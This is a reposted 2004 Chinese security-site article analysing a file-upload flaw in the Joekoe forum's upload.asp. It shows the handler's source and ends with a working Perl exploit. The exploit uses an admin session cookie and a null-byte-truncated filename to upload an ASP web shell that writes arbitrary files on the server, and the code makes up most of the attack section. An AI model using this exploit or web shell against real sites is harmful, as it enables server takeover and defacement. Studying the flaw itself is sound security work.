黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

乔客论坛upload.asp 文件简单分析

2004-9-29 20:05| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 作者:xiaolu      来自:http://666w.com  前言:昨天看黑防网站看到黑防第8期上有篇文章《乔客论坛惊爆UPfi...
作者:xiaolu      来自:http://666w.com  前言:昨天看黑防网站看到黑防第8期上有篇文章《乔客论坛惊爆UPfile严重漏洞》,无奈阿,我这里买不到黑防,只能自己分析分析看看,以下是针对乔客整站程序免费6.6版。    先看upload.asp代码:   <%dim formname,upload_path,upload_type,upload_size,uupuup="|article|down|forum|gallery|news|other|product|video|website|"....  up_name=trim(upload.form("up_name"))  up_text=trim(upload.form("up_text"))  up_path=trim(upload.form("up_path"))  if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""  if len(up_name)<3 then up_name=up_name&upload_time(now_time)  if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"  if len(up_path)<3 then up_path="other"  uppath=up_path  if right(upload_path,1)<>"/" then upload_path=upload_path&"/"  up_path=server.mappath(upload_path&up_path)..      upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))      upfile_name=lcase(upfile_name)      if instr(","&upload_type&",",","&upfile_name&",")>0 then        upfile_name2=upfile_name        upfile_name=up_name&"."&upfile_name        upfile.SaveAs up_path&upfile_name..      else        uptemp="<font class=red_2>上传失败</font>:文件类型只能为:"&replace(upload_type,"|","、")&"等格式) "&go_back      end if...   看几个提交的变量,up_name,up_path,up_text,upfile_name。先看up_path 部分,也就是这里:if int(instr(uup,"|"&up_path&"|"))=0 then up_path="other"只要up_path的值不包含在uup 里边也就是:article,down,forum,gallery,news,other,product,video,website里边up_path就变成了other目录了,这里我们没有用武之地。再看upfile_name,也就是文件扩展名:upfile_name=Right(upfilename,(len(upfilename)-Instr(upfilename,".")))他这个过滤的比较严格,甚至于文件名里边只能有一个.符号,如果文件名是asp.asp.gif也被认为非法,因为他是从第一个.号开始截取到末尾的,放弃这个。代码里很明显up_text对我们来说无用。只剩up_name这个了:     if session("joekoe_online_admin")<>"joekoe_admin" and len(up_name)>2 then up_name=""  if len(up_name)<3 then up_name=up_name&upload_time(now_time)   如果我们不是用管理员身份登陆过后台,也就是session("joekoe_online_admin")<>"joekoe_admin",只要up_name长度达于2,up_name就成了空值,郁闷,不过当session("joekoe_online_admin")="joekoe_admin",我们可以利用,利用程序如下(cookie需要admin的):   #!/usr/bin/perl $| = 1; use Socket; $host = "10.0.0.1";$port = "80";$str = "-----------------------------7d41869a401aa\r\n"."Content-Disposition: form-data; name=\"up_path\"\r\n"."\r\n"."gallery\r\n"."-----------------------------7d41869a401aa\r\n"."Content-Disposition: form-data; name=\"up_name\"\r\n"."\r\n"."p.asp\0\r\n"."-----------------------------7d41869a401aa\r\n"."Content-Disposition: form-data; name=\"up_text\"\r\n"."\r\n"."spic\r\n"."-----------------------------7d41869a401aa\r\n"."Content-Disposition: form-data; name=\"file_name1\"; filename=\"F:\\tools\\sql\\getwebs\\p.gif\"\r\n"."Content-Type: text/plain\r\n"."\r\n"."<%dim objFSO%>\r\n"."<%dim fdata%>\r\n"."<%dim objCountFile%>\r\n"."<%on error resume next%>\r\n"."<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n"."<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n"."<%fdata = request(\"cyfddata\")%>\r\n"."<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n"."<%objCountFile.Write fdata%>\r\n"."<%if err =0 then%>\r\n"."<%response.write \"<font color=red>save Success!</font>\"%>\r\n"."<%else%>\r\n"."<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n"."<%end if%>\r\n"."<%err.clear%>\r\n"."<%end if%>\r\n"."<%objCountFile.Close%>\r\n"."<%Set objCountFile=Nothing%>\r\n"."<%Set objFSO = Nothing%>\r\n"."<%=server.mappath(Request.ServerVariables(\"SCRIPT_NAME\"))%>\r\n"."-----------------------------7d41869a401aa\r\n"."Content-Disposition: form-data; name=\"submit\"\r\n"."\r\n"."点击上传\r\n"."-----------------------------7d41869a401aa\r\n"."\r\n";print $str;$len=length($str); $req ="POST /jj/upload.asp?action=upfile HTTP/1.0\r\n".#"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n"."Referer: http://10.0.0.1/jj/upload.asp?uppath=gallery&upname=gs200483164242&uptext=spic\r\n".#"Accept-Language: zh-cn\r\n"."Content-Type: multipart/form-data; boundary=---------------------------7d41869a401aa\r\n".#"Accept-Encoding: gzip, deflate\r\n".#"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.5); .NET CLR 1.1.4322)\r\n"."Host: 10.0.0.1\r\n"."Content-Length: $len\r\n".#"Connection: Keep-Alive\r\n".#"Cache-Control: no-cache\r\n"."Cookie: ASPSESSIONIDQAQQRCTQ=DOKDHBIALDIDGJFJMCMMIBFJ; joekoe%5Fonline=login%5Fpassword=dd15f89d35c36afb&guest%5Fname=&login%5Fusername=joekoe&counters=yes\r\n". "\r\n". "$str";print $req;@res = sendraw($req); print @res; #Hmm...Maybe you can send it by other way   sub sendraw {     my ($req) = @_;     my $target;     $target = inet_aton($host) || die("inet_aton problems\n");     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");     if(connect(S,pack "SnA4x8",2,$port,$target)){         select(S);     $| = 1;         print $req;     my @res = <S>;         select(STDOUT);     close(S);         return @res;     }     else {     die("Can't connect...\n");     } }       后记:极度郁闷中。。。。。。。,谁能把黑防的文章给偶看看?  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部